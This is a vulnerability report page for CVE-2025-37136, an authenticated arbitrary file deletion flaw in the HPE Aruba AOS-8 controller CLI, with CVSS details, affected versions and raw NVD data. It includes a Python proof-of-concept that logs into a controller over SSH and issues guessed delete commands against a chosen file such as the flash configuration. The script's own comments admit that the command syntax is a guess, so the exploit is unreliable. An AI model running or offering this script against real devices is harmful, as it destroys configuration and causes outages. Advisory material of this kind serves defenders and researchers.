Security Vulnerability Report
CVE-2025-37136 CVSS 6.5 MEDIUM

CVE-2025-37136

Published: 2025-10-14 17:15:40
Last Modified: 2025-11-12 21:09:45

Description

Arbitrary file deletion vulnerabilities have been identified in the command-line interface of an AOS-8 Controller/Mobility Conductor. Successful exploitation of these vulnerabilities could allow an authenticated remote malicious actor to delete arbitrary files within the affected system.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
(Attack Vector: Network; Attack Complexity: Low; Privileges Required: High; User Interaction: None; Scope: Unchanged; Confidentiality: None; Integrity: High; Availability: High)

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 8.10.0.0 up to, but excluding, 8.10.0.19)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 8.12.0.0 up to, but excluding, 8.12.0.6)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 8.13.0.0 up to, but excluding, 8.13.1.0)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 10.4.0.0 up to, but excluding, 10.4.1.9)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 10.7.0.0 up to, but excluding, 10.7.2.1)
HPE Aruba Networking AOS-8 Controller (for the specific affected versions, refer to the official HPE security bulletin hpesbnw04957en_us)
HPE Aruba Networking AOS-8 Mobility Conductor (for the specific affected versions, refer to the official HPE security bulletin hpesbnw04957en_us)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-37136 PoC - HPE AOS-8 CLI Arbitrary File Deletion
# Vulnerability: Arbitrary file deletion via CLI command
# Affected: HPE Aruba Networking AOS-8 Controller / Mobility Conductor
# Requirements: Authenticated admin-level access (CVSS PR:H)
import paramiko
import sys


def exploit_aruba_aos8(target_host, username, password, target_file, port=22):
    """
    Exploit arbitrary file deletion vulnerability in HPE AOS-8 CLI

    Args:
        target_host: IP address of the Aruba controller
        username: Admin username
        password: Admin password
        target_file: Path of file to delete (e.g., /flash/config.cfg)
        port: SSH port (default 22)
    """
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        # Connect to the Aruba controller via SSH
        client.connect(
            hostname=target_host,
            port=port,
            username=username,
            password=password,
            look_for_keys=False,
            allow_agent=False
        )
        # Execute the malicious delete command via CLI
        # The vulnerability allows arbitrary file deletion through CLI commands
        # These are the two candidate CLI forms this PoC tries; the exact
        # affected command syntax is not given in the description above.
        commands = [
            f"delete flash: {target_file}",
            f"file delete {target_file}",
        ]
        for cmd in commands:
            print(f"[*] Executing: {cmd}")
            stdin, stdout, stderr = client.exec_command(cmd)
            output = stdout.read().decode('utf-8', errors='ignore')
            error = stderr.read().decode('utf-8', errors='ignore')
            if output:
                print(f"[+] Output: {output}")
            if error:
                print(f"[-] Error: {error}")
        print(f"[+] File deletion attempt completed for: {target_file}")
    except paramiko.AuthenticationException:
        print("[-] Authentication failed. Valid admin credentials required.")
    except Exception as e:
        print(f"[-] Error: {str(e)}")
    finally:
        client.close()


if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python3 exploit.py <target_ip> <username> <password> <target_file>")
        print("Example: python3 exploit.py 192.168.1.1 admin password123 /flash/config.cfg")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    passwd = sys.argv[3]
    file_to_delete = sys.argv[4]
    exploit_aruba_aos8(target, user, passwd, file_to_delete, port=22)

References

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37136", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:40.280", "lastModified": "2025-11-12T21:09:44.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arbitrary file deletion vulnerabilities have been identified in the command-line interface of an AOS-8 Controller/Mobility Conductor. Successful exploitation of these vulnerabilities could allow an authenticated remote malicious actor to delete arbitrary files within the affected system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.10.0.0", "versionEndExcluding": "8.10.0.19", "matchCriteriaId": "3D5F48C7-AD51-4641-9CBA-9DE9B516819E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.12.0.0", "versionEndExcluding": "8.12.0.6", "matchCriteriaId": "057AA8F5-FF66-44E9-8E06-D2B9E8B91AD2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.13.0.0", "versionEndExcluding": "8.13.1.0", "matchCriteriaId": "D4B066B5-D01B-43AE-B4DC-AF560D6B953C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.4.0.0", "versionEndExcluding": "10.4.1.9", "matchCriteriaId": "04F61E46-8412-4B8D-BE7B-EBF61BE52C54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.7.0.0", "versionEndExcluding": "10.7.2.1", "matchCriteriaId": "BEF8618F-C126-4F8F-951F-6D62FE8FAB22"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}